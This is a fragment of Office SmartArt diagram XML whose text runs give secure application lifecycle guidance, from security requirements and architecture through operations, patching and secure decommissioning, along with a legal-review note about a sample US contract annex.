    <dgm:cxn modelId="{98A34C67-44A9-4549-AA2A-CA6F6EDBEB03}" type="presOf" srcId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2"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F5234BFB-0653-49D4-A393-2589918EFE10}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{1FC62C5B-88D3-46E0-A53E-57D4877596DC}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4FF662A7-AB28-429F-864C-7ABE5405F113}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73DAC175-225C-4995-9056-E10EE015E040}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}"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9A63BADE-E25A-48FB-9671-EE7EAB6807F3}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" srcOrd="0" destOrd="0" parTransId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" sibTransId="{1EBA831D-0061-461C-A1EF-795466184E12}"/>
    <dgm:cxn modelId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{29D76988-94EC-456A-9326-82A5AA778D9E}" srcOrd="3" destOrd="0" parTransId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" sibTransId="{41E4CEE4-E668-414D-904A-3A62818B4066}"/>
    <dgm:cxn modelId="{F5AF1F6E-9C66-4796-998A-0AAADCF54EA0}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F34BF083-B836-4506-BB3B-F0A01920D227}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F474165F-1E84-42E2-A98E-15E6795C7260}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3"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754476D4-7D8C-427D-8A6B-D0B60927777C}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0"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53179D04-4118-4358-AD17-8CE5C48A534D}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B1A30578-DD79-4939-A9F8-28AD03B8AD54}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6CB25451-4220-4743-96D9-4B8B3C4F99CD}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{617DA6D3-BEB8-4800-B1FC-98C29EF082A0}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9C6E9520-F5C2-41C7-A061-0140218D1DED}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A201EAD9-991A-486D-9848-464B08813756}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{36BB49A6-E6C7-4A97-BA09-E504B9A5CB87}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73C77C7A-7151-4540-A36C-02BAF86C1D7F}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6FF81300-4B71-426C-BE41-95BEFFB4F7EB}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C2CAE34C-DC3F-402B-9C24-F36E10DF6763}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1A025FFD-43A9-440F-BAC4-21396F32E15C}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{00B07580-E77C-441E-9EF2-B3E1DE4DA8D2}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3F81A852-98E1-4146-8C30-A1EE27A68299}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C265CBBA-7FC7-4526-B04E-A83BFEDA4408}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26135150-1EEE-452C-9216-92014AD56077}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{505F2738-E317-4DE0-968D-8CAB62E9FE6A}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{98C8E5A8-9EB9-4BBF-9275-14B19FB13AD3}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D700CFC9-8390-4DFA-A6C1-CF888D9B4617}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D6106061-6CBE-4AC7-A61D-98FB10E8573B}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BDF4D38-2D31-4652-8413-675C17D298B1}"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91440" tIns="108000" rIns="9144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receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets.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82800" tIns="108000" rIns="72000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pP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To ensure applications have a secure design, the following should be performed:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>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93600" tIns="108000" rIns="93600"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>To ensure secure operations and changes, the following should be performed:</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93600" tIns="108000" rIns="93600"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>The process of retiring systems is often overlooked. You should ensure that:</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91440" tIns="108000" rIns="9144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with internal or external developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices.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Operating and Changes</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90000" tIns="108000" rIns="90000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="900" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>To </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>ensure secure operations and changes, the following should be performed:</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tIns="108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 functional security requirements.</a:t>
          </a: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tIns="108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tIns="108000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="9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rough planning and design phase.</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tIns="108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tIns="108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Adopt templates and checklists, such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="9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t>.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>NB: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Please note that the Annex is a sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice before using the Annex.</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89289800-6B11-4BC6-BAD7-66615BE75572}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="82800" tIns="108000" rIns="72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703A8D2-81B2-454D-8F9B-0CA1669135F4}" type="parTrans" cxnId="{4BA9DBB4-81DF-421E-B42D-D1053B073E46}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21537CC5-9214-4600-AAB5-332EE3A4C820}" type="sibTrans" cxnId="{4BA9DBB4-81DF-421E-B42D-D1053B073E46}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{657D5226-6628-4A3D-87F9-833B7666A7A2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="82800" tIns="108000" rIns="72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Define a security architecture, controls, and countermeasures according to the protection needs and the planned environmental security level. This should be supported by security specialists.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82800" tIns="108000" rIns="72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Get the application owner to assume remaining risks or to provide additional resources.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82800" tIns="108000" rIns="72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Each sprint, ensure security stories are created for functional requirements, and constraints added for non-functional requirements.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B2318C33-0848-4267-9C94-016EE7B20800}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr tIns="108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Automate the secure setup of the application, interfaces and of all components needed, including required authorizations.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683A137-9B57-417F-A050-9273448B2B4C}" type="parTrans" cxnId="{4DA88187-BABF-443E-9058-C65C439DA0BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BF13A04-DC8A-4830-AC5F-B50FA511F23C}" type="sibTrans" cxnId="{4DA88187-BABF-443E-9058-C65C439DA0BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44A92D55-6CBA-4BF4-9EEA-1B328C3591FE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr tIns="108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AD62425-A044-493A-9ACD-CCC204D1EF4F}" type="parTrans" cxnId="{63135E9D-0166-4C62-A25F-07AA6CA5DAEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83F80472-48C4-49F9-B224-5AD7D393F679}" type="sibTrans" cxnId="{63135E9D-0166-4C62-A25F-07AA6CA5DAEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr tIns="108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tIns="108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level of security required by the application.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tIns="108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tIns="108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CMDB and security architecture.</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6C1A3AA0-0A77-4751-A48E-1C557AA7A1B1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr tIns="108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Operating including the security management for the application (e.g. patch management).</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D0DFC2E-077D-41E3-B0A4-63604CB265D1}" type="parTrans" cxnId="{13F66B5D-9AD9-4BDB-9F02-7656055726AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57282919-BDB2-463E-A675-FC48E99ACDA5}" type="sibTrans" cxnId="{13F66B5D-9AD9-4BDB-9F02-7656055726AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr tIns="108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tIns="108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tIns="108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CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation.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B37AA48A-B472-430E-BA2D-A5987A2A00B1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr tIns="108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Any required data is archived. All other data is securely wiped.</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16351A7-0195-4CE7-B5DB-5E2C1EEF2FF1}" type="parTrans" cxnId="{55153752-3F77-4EF2-AC43-BFB0A8258E33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64A73F2A-13B4-4E68-9636-D09B88E2C56B}" type="sibTrans" cxnId="{55153752-3F77-4EF2-AC43-BFB0A8258E33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr tIns="108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Securely close down the application, including deleting unused accounts and roles and permissions.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tIns="108000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="9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de-DE"/>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90910">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="6" custScaleX="123722" custScaleY="82645">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>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0910">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="6" custScaleX="123722" custScaleY="100001">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>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0910">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>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10000">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{992D08B6-B207-435B-A893-D17B49418ACB}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="6" custScaleX="123722" custScaleY="130285">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>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90910">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6" custScaleX="123722" custScaleY="104940">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>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8302">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="6" custScaleX="123722" custScaleY="68302">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{42C144D0-7BA8-4C4D-9654-9CE455CDB15A}" type="presOf" srcId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{58A49D2A-C8CF-4793-85F3-970ACD08AB2E}" type="presOf" srcId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DD758F65-FE7A-4A69-9123-98C5D3CBCF96}" type="presOf" srcId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="2"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48311AAE-790D-405B-BEB3-7AB59042F49A}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" srcOrd="5" destOrd="0" parTransId="{899E3CF7-9D0C-4165-A610-81A1077E783C}" sibTransId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}"/>
    <dgm:cxn modelId="{4BA9DBB4-81DF-421E-B42D-D1053B073E46}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{89289800-6B11-4BC6-BAD7-66615BE75572}" srcOrd="1" destOrd="0" parTransId="{3703A8D2-81B2-454D-8F9B-0CA1669135F4}" sibTransId="{21537CC5-9214-4600-AAB5-332EE3A4C820}"/>
